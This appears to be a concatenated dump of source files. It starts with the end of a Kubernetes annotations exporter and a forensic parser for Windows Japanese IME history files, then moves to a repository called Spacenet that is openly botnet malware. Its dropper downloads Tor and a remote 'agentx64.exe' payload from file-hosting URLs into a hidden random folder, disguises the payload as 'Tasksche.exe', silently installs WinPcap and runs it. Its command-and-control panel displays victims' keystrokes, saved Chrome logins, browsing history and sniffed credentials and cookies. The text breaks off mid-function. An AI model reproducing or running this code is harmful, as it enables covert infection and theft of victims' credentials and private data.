_logger.debug("Metrics page updated.")
time.sleep(args.metrics_refresh_interval)
def run():
"""Calls :func:`main` passing the CLI arguments extracted from :obj:`sys.argv`
This function can be used as entry point to create console scripts with setuptools.
"""
main(sys.argv[1:])
if __name__ == "__main__":
# ^ This is a guard statement that will prevent the following code from
# being executed in the case someone imports this file instead of
# executing it as a script.
# https://docs.python.org/3/library/__main__.html
# After installing your project with pip, users can also run your Python
# modules as scripts via the ``-m`` flag, as defined in PEP 338::
#
# python -m k8s_annotations_exporter.export -v
#
run()
``` |
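For a quick local run, the exporter can also be driven programmatically through `main()`; note that it blocks in its refresh loop. The flag values below are illustrative assumptions (a reachable cluster via the default kubeconfig, annotations read from Pod resources):
```python
from k8s_annotations_exporter.export import main

# Equivalent to: python -m k8s_annotations_exporter.export --resource-kind Pod -v
# Metrics are then scrapeable on the default HTTP port 8000.
main(["--resource-kind", "Pod", "--metrics-refresh-interval", "30", "-v"])
```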
{
"source": "4n6ist/JpnIHDS",
"score": 3
} |
#### File: 4n6ist/JpnIHDS/JpnIHDS_parser.py
```python
import os
import sys
import argparse
import csv
from datetime import datetime, timedelta, timezone
from ctypes import *
class FHeader(LittleEndianStructure):
_pack_ = 1
_fields_ = (
('modified_time', c_uint64),
('file_size', c_uint32),
('unknown1', c_uint32), # 1 or 2
('history_num', c_uint32),
('header_size', c_uint32),
('learn_num', c_uint32),
('history_size', c_uint32)
)
class RHeader(LittleEndianStructure):
_pack_ = 1
_fields_ = (
('conv_time', c_uint64),
('record_size', c_uint16),
('header_size', c_uint16),
('unknown2', c_byte), # always 1
('conv_num', c_byte),
('unknown3', c_uint16) # history == 0, learn > 0
)
class RBody(LittleEndianStructure):
_pack_ = 1
_fields_ = (
('body_size', c_uint16),
('input_length', c_ubyte),
('conv_length', c_ubyte),
('unknown4', c_uint32)
)
def print_fhdr_info(fhdr):
timestamp_us = fhdr.modified_time/10.
print("--File Header Information--")
print("Timestamp(UTC): ", datetime(1601,1,1) + timedelta(microseconds=timestamp_us))
print("FileSize: ", fhdr.file_size)
print("Unknown1: ", fhdr.unknown1)
print("HistoryRecords: ", fhdr.record_num)
print("HeaderSize: ", fhdr.header_size)
print("LearnRecords: ", fhdr.learn_num)
print("HistorySize: ", fhdr.history_size)
print()
def print_rhdr_info(rhdr):
print("--Record Header Information--")
print("RecordSize: ", rhdr.record_size)
print("HeaderSize: ", rhdr.header_size)
print("Unknown2: ", rhdr.unknown2)
print("ConvNum: ", rhdr.conv_num)
print("Unknown3: ", rhdr.unknown3)
print()
def print_rbody_info(rbody):
print("--Record Body Information--")
print("BodySize: ", rbody.body_size)
print("InputLength: ", rbody.input_length)
print("ConvLength: ", rbody.conv_length)
print("Unknown4: ", rbody.unknown4)
print()
def parse_record_body(input_file, rbody, inputlist, convlist, mergelist, unknown4list):
unknown4list.append(str(rbody.unknown4))
input_chars = input_file.read(rbody.input_length*2).decode('UTF-16LE')
inputlist.append(input_chars)
if rbody.conv_length > 0:
conv_chars = input_file.read(rbody.conv_length*2).decode('UTF-16LE')
convlist.append(conv_chars)
mergelist.append(conv_chars)
else:
mergelist.append(input_chars)
def utc_to_jst(timestamp_utc):
# timestamp_jst = timestamp_utc.astimezone(timezone(timedelta(hours=+9)))
timestamp_jst = timestamp_utc + timedelta(hours=+9)
converted_jst = datetime.strftime(timestamp_jst, '%Y-%m-%d %H:%M:%S.%f')
return converted_jst
def parse_jpnihds(input_file, output, debug):
record_field = []
num=0
fhdr = FHeader()
input_file.readinto(fhdr)
if debug:
print_fhdr_info(fhdr)
cur_pos = fhdr.header_size
while input_file.tell() < fhdr.file_size:
input_file.seek(cur_pos)
rhdr = RHeader()
input_file.readinto(rhdr)
timestamp_us = rhdr.conv_time/10.
timestamp_utc = datetime(1601,1,1) + timedelta(microseconds=timestamp_us)
tsstr_utc = datetime.strftime(timestamp_utc, '%Y-%m-%d %H:%M:%S.%f')
tsstr_jst = utc_to_jst(timestamp_utc)
if debug:
print_rhdr_info(rhdr)
inputlist, convlist, mergelist, unknown4list = [],[],[],[]
input_file.seek(cur_pos+rhdr.header_size)
rbody = RBody()
input_file.readinto(rbody)
if debug:
print_rbody_info(rbody)
parse_record_body(input_file, rbody, inputlist, convlist, mergelist, unknown4list)
for i in range(rhdr.conv_num-1):
input_file.readinto(rbody)
if debug:
print_rbody_info(rbody)
parse_record_body(input_file, rbody, inputlist, convlist, mergelist, unknown4list)
input_str=" ".join(inputlist)
conv_str=" ".join(convlist)
merge_str="".join(mergelist)
unknown4_str=" ".join(unknown4list)
record_field.extend([cur_pos, num, tsstr_utc, tsstr_jst, input_str, conv_str, merge_str, rhdr.unknown2, rhdr.unknown3, unknown4_str])
try:
csv.writer(output, delimiter="\t", lineterminator="\n", quoting=csv.QUOTE_ALL).writerow(record_field)
except UnicodeEncodeError as err:
print('UnicodeEncodeError has occurred. To save the result, use -o option instead of redirect.', file=sys.stderr)
sys.exit("Quit.")
record_field = []
num += 1
cur_pos += rhdr.record_size
def main():
parser = argparse.ArgumentParser(description="JpnIHDS.dat parser")
parser.add_argument("input", help="Input File - JpnIHDS.dat")
parser.add_argument("-o", "--output", help="Output File (Default: stdout)")
parser.add_argument("--debug", action="store_true", default=False, help="Debug Mode")
args = parser.parse_args()
if os.path.exists(os.path.abspath(args.input)):
input_file = open(args.input, "rb")
else:
sys.exit("{0} does not exist.".format(args.input))
if args.output:
tsv = open(args.output, "w", encoding='UTF-16')
else:
tsv = sys.stdout
row = ["offset", "no.", "timestamp(utc)", "timestamp(jst)", "input", "converted", "merged", "unknown2", "unknown3", "unknown4"]
csv.writer(tsv, delimiter="\t", lineterminator="\n", quoting=csv.QUOTE_ALL).writerow(row)
parse_jpnihds(input_file, tsv, args.debug)
if __name__ == '__main__':
main()
``` |
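`parse_jpnihds()` can also be called without the CLI wrapper; the module name and input path below are assumptions for illustration:
```python
import sys
from JpnIHDS_parser import parse_jpnihds  # assumes the script above is on the import path

# Hypothetical JpnIHDS.dat location; parsed records are written to stdout as TSV rows.
with open("JpnIHDS.dat", "rb") as input_file:
    parse_jpnihds(input_file, sys.stdout, debug=False)
```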
{
"source": "4n6strider/Spacenet",
"score": 3
} |
#### File: Agent/Dropper/dropper.py
```python
import os
import sys
import zipfile
import random
import string
import urllib
import psutil
import requests
import shutil
from threading import Thread
from time import sleep
from pathlib import Path
DSTFOLDER = ''
if getattr(sys, 'frozen', False):
EXECUTABLE_PATH = sys.executable
elif __file__:
EXECUTABLE_PATH = __file__
else:
EXECUTABLE_PATH = ''
EXECUTABLE_NAME = os.path.basename(EXECUTABLE_PATH)
def mdown(url,dst):
# M download
r = requests.get(url, verify=False,stream=True)
r.raw.decode_content = True
with open(dst, 'wb') as f:
shutil.copyfileobj(r.raw, f)
def sttor(path_to_execute):
os.system(path_to_execute)
def wintest():
paths = ["C:\\Program Files (x86)\\WinPcap\\rpcapd.exe","C:\\Program Files\\WinPcap\\rpcapd.exe"]
for path in paths:
my_file = Path(path)
if my_file.is_file():
print "[*] Found Occurence of Winpcap"
return True
return False
def stage1():
# Agent Download
global DSTFOLDER
TORRUNNING = False
# Gen Folder Name
fname = 'C:\\Users\\Public\\'
fname += ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(16))
DSTFOLDER = fname
print "[*] Generating folder : " , DSTFOLDER
# Gen File Name
filename = '\\Tasksche.exe'
print "[*] Generating filename : " , filename
# Gen Folder
if not os.path.exists(fname):
print "[*] Creating folder ."
os.makedirs(fname)
#print "[*] Downloading TDMB64.exe ..."
print "[*] Downloading Tor.zip 72 MB ..."
mdown('https://srv-file1.gofile.io/download/jr0NmZ/7db34320a0c414892c0e1fced5b46931/Tor.zip', DSTFOLDER + "\\" + "Tor.zip")
# https://gofile.io/?c=jr0NmZ
print "[+] Downloaded."
print "[*] Creating Extraction dir : " , DSTFOLDER + "\\RT64DMB"
os.makedirs(DSTFOLDER + "\\RT64DMB")
print "[*] Extracting Tor.zip ..."
zip_ref = zipfile.ZipFile(DSTFOLDER + "\\Tor.zip", 'r')
zip_ref.extractall(DSTFOLDER + "\\RT64DMB")
zip_ref.close()
print "[+] Extracted everything"
print "[*] Cleaning up .zip ..."
os.remove(DSTFOLDER + "\\Tor.zip")
print "[*] Downloading winpcap ..."
# Replace URL with Agent URL
mdown('https://github.com/boundary/winpcap-installer/archive/master.zip', DSTFOLDER + "\\" + "winpcap.zip")
print "[+] Downloaded."
print "[*] Creating Extraction dir : " , DSTFOLDER + "\\winpcap"
os.makedirs(DSTFOLDER + "\\winpcap")
print "[*] Extracting winpcap.zip ..."
zip_ref = zipfile.ZipFile(DSTFOLDER + "\\winpcap.zip", 'r')
zip_ref.extractall(DSTFOLDER + "\\winpcap")
zip_ref.close()
print "[+] Extracted everything"
print "[*] Cleaning up .zip ..."
os.remove(DSTFOLDER + "\\winpcap.zip")
print "[*] Renaiming Archive Installer to : Installer.exe ..."
os.rename(DSTFOLDER + "\\winpcap\\winpcap-installer-master\\winpcap-truesight-meter-4.1.3.exe", DSTFOLDER + "\\winpcap\\winpcap-installer-master\\Installer.exe")
print "[*] Starting winpcap installer ..."
os.system(DSTFOLDER + "\\winpcap\winpcap-installer-master\\Installer.exe /S")
print "[*] Checking for Winpcap Installation or Exits ..."
if wintest() == False:
sys.exit(0)
print "[+] Winpcap Installed ."
print "[*] Downloading .exe ..."
# Replace URL with Agent URL
mdown('https://srv-file1.gofile.io/download/9TSelc/7db34320a0c414892c0e1fced5b46931/agentx64.exe', DSTFOLDER + "\\" + filename)
print "[+] Downloaded."
path_to_execute = DSTFOLDER + "\\RT64DMB\\Browser\\TorBrowser\\Tor\\tor.exe --defaults-torrc \\torrc.default"
print "[*] Executing tor.exe command : %s " % path_to_execute
thread = Thread(target = sttor, args = (path_to_execute, ))
thread.start()
while TORRUNNING:
for p in psutil.process_iter():
try:
if p.name() == 'tor.exe':
print "[*] Tor.exe is running..."
TORRUNNING = True
break
except psutil.Error:
print "[*] Tor.exe not found ."
sleep(2000)
print "[*] Executing ... " , DSTFOLDER + "\\" + filename
#Execute File
os.system( DSTFOLDER + "\\" + filename)
stage1()
```
#### File: C&C/modules/makedir.py
```python
import os
# Function to create dir.
def run(dst):
if not os.path.exists(dst):
os.makedirs(dst)
```
#### File: Software/C&C/runner.py
```python
import csv
from BeautifulSoup import BeautifulSoup
def run():
penetration = {}
reader = csv.reader(open('TempDir/tmpLocs.csv'), delimiter=",")
for row in reader:
try:
penetration[row[0].lower()] = float( row[1].strip() )
except:
pass
svg = open('static/images/countries.svg', 'r').read()
soup = BeautifulSoup(svg, selfClosingTags=['defs','sodipodi:namedview','path'])
colors = ["#4f537a", "#495096", "#646ed1", "#000c84", "#0111ad", "#a107c4"]
gs = soup.contents[2].findAll('g',recursive=False)
paths = soup.contents[2].findAll('path',recursive=False)
path_style = "fill-opacity:1;stroke:#ffffff;stroke-width:0.99986994;stroke-miterlimit:3.97446823;stroke-dasharray:none;stroke-opacity:1;fill:"
for p in paths:
if 'land' in p['class']:
try:
rate = penetration[p['id']]
except:
continue
if rate > 100:
color_class = 5
elif rate > 50:
color_class = 4
elif rate > 30:
color_class = 3
elif rate > 10:
color_class = 2
elif rate >= 1:
color_class = 1
else:
color_class = 0
color = colors[color_class]
p['style'] = path_style + color
for g in gs:
try:
rate = penetration[g['id']]
except:
continue
if rate > 100:
color_class = 5
elif rate > 50:
color_class = 4
elif rate > 30:
color_class = 3
elif rate > 10:
color_class = 2
elif rate >= 1:
color_class = 1
else:
color_class = 0
color = colors[color_class]
g['style'] = path_style + color
for t in g.findAll('path',recursive=True):
t['style'] = path_style + color
f = open("static/images/world.svg", "w")
f.write(str(soup).replace('viewbox','viewBox',1))
```
#### File: Software/C&C/server.py
```python
import cherrypy
import sqlite3
import time
import os
import re
import random
import string
import hashlib
import json
import sys
import glob
import chart
import codecs
import HTMLParser
import base64
import argparse
import shutil
import pygame
from itertools import izip
from termcolor import colored, cprint
from urllib2 import urlopen
from contextlib import closing
from threading import Thread
from dateutil.parser import parse
from time import gmtime, strftime
from pathlib import Path
#----------------------------------------------
from modules import makedir
from modules import log
import signal
#----------------------------------------------
# ----- Software vars -----
SYS_VERSION = "0.0.1"
BUFFER_BOT_REMOVED = []
ALL_BOTS = ""
# ------------------------
# ----- Web-Gui vars -----
COOKIE_NAME = "SPACENETSESSID"
SESSION_TIMEOUT = 1000
PRETABLE = '''
<table class="cp_bots">
<tr><th class="cp_bots_th" onclick="sortTable(0)">OS</th><th class="cp_bots_th" onclick="sortTable(1)">Infected N°</th></tr>
'''
OSSUMMARY_LIST = '''
<tr class="cp_bots_tr1">
<th style="text-align:left;font-weight:normal;">{{os}}</th>
<th style="text-align:left">{{occurences}}</th>
</tr>
'''
LOGIN_PASSWORD_FLAG = 0
LAST_CONNECTION_ADMIN = ""
LAST_IP_ADMIN = ""
# ------------------------
#----------------------------------------------
def signal_handler(signal, frame):
SaveLog("Aborted.")
os.system("service tor stop > /dev/null")
os.system("pkill -9 python")
EXECUTEONSTART_FLAG = False
UPDATE_AGENT_FLAG = False
SAVERESULT_FLAG = False
EXECUTEDELAY_FLAG = False
URL_MD = ""
FNAME_MD = ""
DELAY = 0
session_cookie = None
last_session_activity = 0
switch = 0
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<",
}
def SaveLog(action):
log.save(str(action))
def file_is_empty(path):
return os.stat(path).st_size==0
def get_cnt(lVals):
global OSSUMMARY_LIST, PRETABLE
output = ''
output1 = ''
output2 = ''
d = dict(zip(lVals, [0] * len(lVals)))
for x in lVals:
d[x] += 1
output1 += OSSUMMARY_LIST.replace("{{os}}",str(x))
output2 += output1.replace("{{occurences}}",str(d[x]))
output = str(PRETABLE) + str(output2) + "</table><br>"
return output
def error_page(status, message, traceback, version):
with open("html/error.html", "r") as f:
SaveLog("SERVER ERROR : %s " %( status, status, message))
html = f.read()
return html % (status, status, message)
def worldgen():
chart.create()
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return None
def html_escape(text):
return "".join(html_escape_table.get(c,c) for c in text)
def validate_botid(candidate):
return re.match('^[a-zA-Z0-9\s\-_]+$', candidate) is not None
def query_DB(sql, params=()):
conn = sqlite3.connect('main.db')
cursor = conn.cursor()
result = []
for row in cursor.execute(sql, params):
result.append(row)
conn.close()
return result
def exec_DB(sql, params=()):
conn = sqlite3.connect('main.db')
cursor = conn.cursor()
cursor.execute(sql, params)
conn.commit()
conn.close()
def get_admin_password():
result = query_DB("SELECT password FROM users WHERE name='admin'")
if result:
return result[0][0]
else:
return None
def set_admin_password(admin_password):
password_hash = hashlib.sha256()
password_hash.update(admin_password)
exec_DB("DELETE FROM users WHERE name='admin'")
exec_DB("INSERT INTO users VALUES (?, ?, ?)", (None, "admin", password_hash.hexdigest()))
def require_admin(func):
def wrapper(*args, **kwargs):
global session_cookie
global last_session_activity
global SESSION_TIMEOUT
if session_cookie and COOKIE_NAME in cherrypy.request.cookie and session_cookie == cherrypy.request.cookie[COOKIE_NAME].value:
if time.time() - last_session_activity > SESSION_TIMEOUT:
raise cherrypy.HTTPRedirect("/timeout")
else:
last_session_activity = time.time()
return func(*args, **kwargs)
else:
raise cherrypy.HTTPRedirect("/login")
return wrapper
class Main(object):
@cherrypy.expose
@require_admin
def index(self):
SaveLog("REQUEST : 300 [ Redirect ] | Redirected to Login.html.")
cherrypy.HTTPRedirect("/cnc")
@cherrypy.expose
def login(self, password=''):
global LOGIN_PASSWORD_FLAG , LAST_CONNECTION_ADMIN , LAST_IP_ADMIN
admin_password = get_admin_password()
if not admin_password:
SaveLog("Admin account not set yet, ready to generate.")
if password:
set_admin_password(password)
with open("html/AdminPasswordSet.html", "r") as f:
SaveLog("REQUEST : 200 [ Ok ] | AdminPasswordSet.html.")
html = f.read()
return html
else:
with open("html/CreatePassword.html", "r") as f:
SaveLog("REQUEST : 200 [ Ok ] | CreatePassword.html.")
html = f.read()
return html
else:
password_hash = hashlib.sha256()
password_hash.update(password)
if password == "":
if LOGIN_PASSWORD_FLAG == 0:
SaveLog("REQUEST : 200 [ Ok ] | New connection on the login.")
LOGIN_PASSWORD_FLAG += 1
else:
pass
else:
if password_hash.hexdigest() == get_admin_password():
global session_cookie
session_cookie = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(64))
cherrypy.response.cookie[COOKIE_NAME] = session_cookie
global last_session_activity
last_session_activity = time.time()
SaveLog("REQUEST : 200 [ Ok ] | Admin logged in with password : %s " % password)
LAST_CONNECTION_ADMIN = str(time.ctime())
LAST_IP_ADMIN = str(cherrypy.request.remote.ip)
raise cherrypy.HTTPRedirect('cnc')
global switch
if switch == 0:
with open("html/Login.html", "r") as f:
SaveLog("REQUEST : 200 [ Ok ] | Login.html.")
html = f.read()
switch += 1
return html
else:
with open("html/LoginEr.html", "r") as f:
if password == "":
SaveLog("REQUEST : 200 [ Ok ] | LoginEr.html.")
else:
SaveLog("REQUEST : 401 [ Unauthorized ] | Login failed with password : %s " % password)
html = f.read()
return html
@cherrypy.expose
def disconnect(self):
SaveLog("Exiting User.")
session_cookie = None
cherrypy.response.cookie[COOKIE_NAME] = ''
cherrypy.response.cookie[COOKIE_NAME]['expires'] = 0
with open("html/Disconnect.html", "r") as f:
SaveLog("REQUEST : 200 [ Ok ] | Disconnect.html.")
html = f.read()
return html
@cherrypy.expose
def timeout(self):
SaveLog("Timeout Session.")
session_cookie = None
cherrypy.response.cookie[COOKIE_NAME] = ''
cherrypy.response.cookie[COOKIE_NAME]['expires'] = 0
with open("html/Timeout.html", "r") as f:
SaveLog("REQUEST : 408 [ Timeout ] | Timeout.html.")
html = f.read()
return html
@cherrypy.expose
@require_admin
def passchange(self, password=''):
SaveLog("REQUEST : 200 [ Ok ] | Admin password updated.")
if password:
set_admin_password(password)
with open("html/AdminPasswordSet.html", "r") as f:
SaveLog("REQUEST : 200 [ Ok ] | AdminPasswordSet.html.")
html = f.read()
return html
else:
SaveLog("REQUEST : 200 [ Ok ] | CreatePassword.html.")
with open("html/CreatePassword.html", "r") as f:
html = f.read()
return html
class CNC(object):
argc_buffer = "null"
@cherrypy.expose
@require_admin
def index(self):
global ALL_BOTS
try:
os.remove("TempDir/tmpLocs.txt")
os.remove("TempDir/tmpLocs.csv")
except:
pass
SaveLog("REQUEST : 200 [ Ok ] | Overview.html")
bot_list = query_DB("SELECT * FROM bots ORDER BY lastonline DESC")
ALL_BOTS = bot_list
output = ""
counter = 0
online = 0
commands = 0
offline = 0
lst_conn = ""
all_cmds = query_DB('SELECT * FROM commands ORDER BY date DESC')
if not all_cmds:
pass
else:
for cmd in all_cmds :
commands += 1
if not bot_list :
loc = "none"
cc = "nn"
chart.run(loc,cc)
lst_conn = "-"
else:
for bot in bot_list:
counter += 1
ip = bot[2]
if counter == 1:
lst_conn = str(time.ctime(bot[1]))
out_file = open("TempDir/BotIps.txt","a")
out_file.write("%s\n" % ip)
out_file.close()
if time.time() - 30 < bot[1]:
online += 1
if '192.168' in ip or '127.0' in ip:
loc = "Italy"
cc = "it"
cc = cc.lower()
chart.run(loc,cc)
else:
#check ip location
url = ('http://freegeoip.net/json/%s' %ip)
try:
with closing(urlopen(url)) as response:
location = json.loads(response.read())
loc = location['country_name']
cc = location['country_code']
cc = cc.lower()
chart.run(loc,cc)
except:
print("Location could not be determined automatically")
thread = Thread(target = worldgen)
thread.start()
thread.join()
with open("html/Overview.html", "r") as f:
html = f.read()
print html
if int(counter) == 0:
offline = 0
else:
offline = int(counter) - int(online)
html = html.replace("{{output}}", str(output))
html = html.replace("{{bots}}", str(counter))
html = html.replace("{{bats}}", str(online))
html = html.replace("{{offs}}", str(offline))
html = html.replace("{{cmds}}", str(commands))
html = html.replace("{{lst}}", str(lst_conn))
with open("TempDir/tmpLocs.txt") as f:
for line in f:
if "none" in line:
pass
else:
country = line.split(":")[0]
country = country.replace(" ","")
botsnumber = line.split(":")[1]
output += '''
<tr>
<th><img src="/static/flags/%s.png" alt="Flag" title="%s" style="all:unset;width:24px;height:24px;vertical-align:middle"></th>
<td>%s</td>
<td>%s</td>
</tr>
''' % (country , country , country, botsnumber)
if output == "":
output = "No bots registered."
html = html.replace("{{output}}", output)
try:
os.remove("TempDir/tmp{{botid}}.txt")
except:
pass
return html
@cherrypy.expose
@require_admin
def account(self):
global LAST_CONNECTION_ADMIN, LAST_IP_ADMIN
with open("html/Account.html", "r") as f:
html = f.read()
html = html.replace("{{time}}", LAST_CONNECTION_ADMIN)
html = html.replace("{{ip}}", LAST_IP_ADMIN)
url = ('http://freegeoip.net/json/%s' % LAST_IP_ADMIN)
if "192.168" in LAST_IP_ADMIN:
html = html.replace("{{geo}}", "Italy")
else:
try:
with closing(urlopen(url)) as response:
location = json.loads(response.read())
loc = location['country_name']
html = html.replace("{{geo}}", loc)
except:
print("Location could not be determined automatically")
return html
@cherrypy.expose
@require_admin
def list(self):
global ALL_BOTS
try:
os.remove("TempDir/tmpLocs.txt")
os.remove("TempDir/tmpLocs.csv")
except:
pass
SaveLog("REQUEST : 200 [ Ok ] | List.html")
bot_list = query_DB("SELECT * FROM bots ORDER BY lastonline DESC")
ALL_BOTS = bot_list
output = ""
counter = 0
online = 0
for bot in bot_list:
counter += 1
ip = bot[2]
out_file = open("TempDir/BotIps.txt","a")
out_file.write("%s\n" % ip)
out_file.close()
if '192.168' in ip or '127.0' in ip:
loc = "Italy"
cc = "it"
cc = cc.lower()
chart.run(loc,cc)
else:
#check ip location
url = ('http://freegeoip.net/json/%s' %ip)
try:
with closing(urlopen(url)) as response:
location = json.loads(response.read())
loc = location['country_name']
cc = location['country_code']
cc = cc.lower()
chart.run(loc,cc)
except:
print("Location could not be determined automatically")
output += '''<tr><td><a href="bot?botid=%s" class="cp_botid">%s</a><a href="info?botid=%s"><img src="/static/images/info.png" alt="Info" title="Info" class="info"></a></td><td>%s</td><td>%s</td><td>%s</td><td><input type="checkbox" id="%s" class="botid" /></td><td VALIGN = Middle Align = Left><img src="/static/flags/%s.png" alt="Flag" title="%s"></td></tr>''' % ( bot[0],bot[0],bot[0], "Online" if time.time() - 30 < bot[1] else time.ctime(bot[1]), bot[2], bot[3],bot[0], loc , loc)
if "Online" in output:
output = output.replace("<td>Online</td>","<td style='color:rgb(66, 134, 244);'>Online</td>")
online += 1
with open("html/List.html", "r") as f:
html = f.read()
html = html.replace("{{bot_table}}", output)
html = html.replace("{{bots}}", str(counter))
try:
os.remove("TempDir/tmp{{botid}}.txt")
except:
pass
return html
@cherrypy.expose
@require_admin
def bot(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Bot.html -> %s " % botid)
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
with open("html/Bot.html", "r") as f:
# Scrive un file.
out_file = open("TempDir/tmp{{botid}}.txt","w")
out_file.write(botid)
out_file.close()
html = f.read()
html = html.replace("{{botid}}", botid)
return html
@cherrypy.expose
@require_admin
def info(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Info.html -> %s " % botid)
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
with open("html/Info.html", "r") as f:
html = f.read()
html = html.replace("{{botid}}", botid)
with open("DumpDir/%s/info.txt"%botid, "r") as e:
buffer = e.read()
buffer = buffer.replace("--", "<tr>")
buffer = buffer.replace("++", "</tr>")
buffer = buffer.replace("::", "<td>")
buffer = buffer.replace(";;", "</td>")
html = html.replace("{{infor}}", buffer)
return html
@cherrypy.expose
@require_admin
def ossummary(self):
SaveLog("REQUEST : 200 [ Ok ] | OsSummary.html")
bot_list = query_DB("SELECT * FROM bots ORDER BY lastonline DESC")
output = ""
buffer_os = ""
counter = 0
osinf = []
for bot in bot_list:
osinf.append(bot[3])
counter+=1
with open("html/OsSummary.html", "r") as f:
html = f.read()
html = html.replace("{{bots}}",str(counter))
if get_cnt(osinf) != "":
html = html.replace("{{ostable}}",str(get_cnt(osinf)))
else :
html = html.replace("{{ostable}}","No Os Infected Yet!")
return html
@cherrypy.expose
@require_admin
def passset(self):
with open("html/AdminPasswordSet1.html", "r") as f:
SaveLog("REQUEST : 200 [ Ok ] | AdminPasswordSet1.html.")
html = f.read()
return html
@cherrypy.expose
@require_admin
def keylogger(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Keylogger.html -> %s " % botid )
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
with open("html/KeyLog.html", "r") as f:
html = f.read()
target0 = "DumpDir/%s/Keystrokes.txt" % botid
my_file = Path(target0)
if my_file.is_file():
with open(target0, "r") as d:
if file_is_empty(target0)== True:
html = html.replace("{{KL}}","No Keystrokes Stored.")
else:
switch = False
for line in d:
CURRENT_WINDOW = ''
TIME_WINDOW = ''
STROKES = ''
tabletorpl = ''
tdpreset = '''<table class="table_info"><tr>
<th>Window Title Name</th>
<td>{{WTN}}</td>
</tr>
<tr>
<th>Time</th>
<td>{{TM}}</td>
</tr><tr>
<th>Keys Pressed</th>
<td>{{STK}}</td>
</tr></table><br><br>{{END}}'''
if line.startswith("["):
CURRENT_WINDOW = line.split("]")[0]
CURRENT_WINDOW = CURRENT_WINDOW.replace("[","")
tabletorpl = tdpreset.replace("{{WTN}}",CURRENT_WINDOW)
TIME_WINDOW = line.split("@", 2)[2]
TIME_WINDOW = TIME_WINDOW.split("|||")[0]
tabletorpl = tabletorpl.replace("{{TM}}",TIME_WINDOW)
STROKES = line.split("|||")[1]
tabletorpl = tabletorpl.replace("{{STK}}",STROKES)
if switch == True:
html = html.replace("{{END}}",tabletorpl)
else:
html = html.replace("{{KL}}",tabletorpl)
switch = True
switch = True
else:
pass
else:
html = html.replace("{{KL}}","No Keystrokes Stored.")
html = html.replace("{{botid}}", botid)
html = html.replace("{{END}}", "")
return html
@cherrypy.expose
@require_admin
def dbpass(self,*argv):
SaveLog("REQUEST : 200 [ Ok ] | Database.html")
with open("html/DbPass.html", "r") as f:
html = f.read()
try:
file = open("TempDir/tmp.txt", "r")
buffer_ = file.read()
if buffer_ == "":
buffer_ = "No matches found for this research."
buffer_ = buffer_.replace("\n","<br>")
buffer_ = buffer_.replace("Website:","<b>Website</b>:")
buffer_ = buffer_.replace("Username:","<b>Username</b>:")
buffer_ = buffer_.replace("Password:","<b>Password</b>:")
buffer_ = buffer_.replace("DumpDir/","")
except :
buffer_ = ""
html = html.replace("{{results}}",buffer_)
try:
os.remove("TempDir/tmp.txt")
except:
pass
return html
@cherrypy.expose
@require_admin
def chrome(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Chrome.html -> %s " % botid)
html = ''
krc = ''
hic = ''
afc = ''
mln = 1000
with open("html/Chrome.html", "r") as f:
html = f.read()
target0 = "DumpDir/%s/KRC.txt" % botid
target1 = "DumpDir/%s/HIC.txt" % botid
target2 = "DumpDir/%s/AFC.txt" % botid
try:
max_counter0 = 0
max_counter1 = 0
max_counter2 = 0
html = html.replace("{{botid}}",botid)
f = codecs.open(target0, encoding='utf-8')
for line in f:
if max_counter0 == mln:
krc += "<br><u>FILE TOO BIG ! TO AVOID BROWSER CRASH YOU CAN SEE ONLY THE FIRST %s LINES , CHECK THE FILE %s TO SEE THE FULL DATA.</u>" % (str(mln),target0)
break
krc += repr(line)
max_counter0 += 1
krc = krc.replace("'","'")
krc = krc.replace("\\n'","<br>")
krc = krc.replace("u'","")
html = html.replace("{{KRC}}",krc)
h = codecs.open(target1, encoding='utf-8')
for line in h:
if max_counter1 == mln:
hic += "<br><u>FILE TOO BIG ! TO AVOID BROWSER CRASH YOU CAN SEE ONLY THE FIRST %s LINES , CHECK THE FILE %s TO SEE THE FULL DATA.</u>" % (str(mln),target1)
break
hic += repr(line)
max_counter1 += 1
hic = hic.replace("'","'")
hic = hic.replace("u'","")
hic = hic.replace("\\n'","<br>")
html = html.replace("{{HIC}}",hic)
y = codecs.open(target2, encoding='utf-8')
for line in y:
if max_counter2 == mln:
afc += "<br><u>FILE TOO BIG ! TO AVOID BROWSER CRASH YOU CAN SEE ONLY THE FIRST %s LINES , CHECK THE FILE %s TO SEE THE FULL DATA.</u>" % (str(mln),target2)
break
afc += repr(line)
max_counter2 += 1
afc = afc.replace("'","'")
afc = afc.replace("u'","")
afc = afc.replace("\\n'","<br>")
afc = afc.replace(""",'"')
html = html.replace("{{AFC}}",HTMLParser.HTMLParser().unescape(afc))
except:
html = html.replace("{{KRC}}","Nothing Here.")
html = html.replace("{{HIC}}","Nothing Here.")
html = html.replace("{{AFC}}","Nothing Here.")
return html
@cherrypy.expose
@require_admin
def getcache(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Cache.html => %s" % botid)
with open("html/Cache.html", "r") as f:
html = f.read()
final_html = ''
filepath = "DumpDir/%s/getauth.txt" % botid
try:
with open(filepath,"r") as t:
everything = t.read()
if everything != "":
for item in everything.split("]]]==="):
if "===[[[" in item:
TABLE_PRESET = '''<table>
<tr>
<th>Request Type:</th>
<td>{{Request-Type}}</td>
</tr>
<tr>
<th>Host-Website:</th>
<td style="color:red">{{Host}}</td>
</tr>
<tr>
<th>User Agent:</th>
<td>{{User-Agent}}</td>
</tr>
<tr>
<th>Language:</th>
<td>{{Language}}</td>
</tr>
<tr>
<th>Hour:</th>
<td>{{Time}}</td>
</tr>
<tr>
<th>Cookie:</th>
<td>{{Cookie}}</td>
</tr>
<th>Payload-Credentials:</th>
<td style="color:red">{{Payload}}</td>
</tr>
</table><br>'''
TABLE_UNSORTED_PACKET = '''<table>
<tr>
<th> ( Unsorted Packet ) Packet Content:</th>
<td>{{pkt}}</td>
</tr>
</table><br>'''
buffer = item [ item.find("===[[[")+len("===[[[") : ]
COMPLETE_PACKET = ''
REQUEST_TYPE = ''
HOST = ''
USER_AGENT = ''
LANGUAGE = ''
HOUR = ''
COOKIE = ''
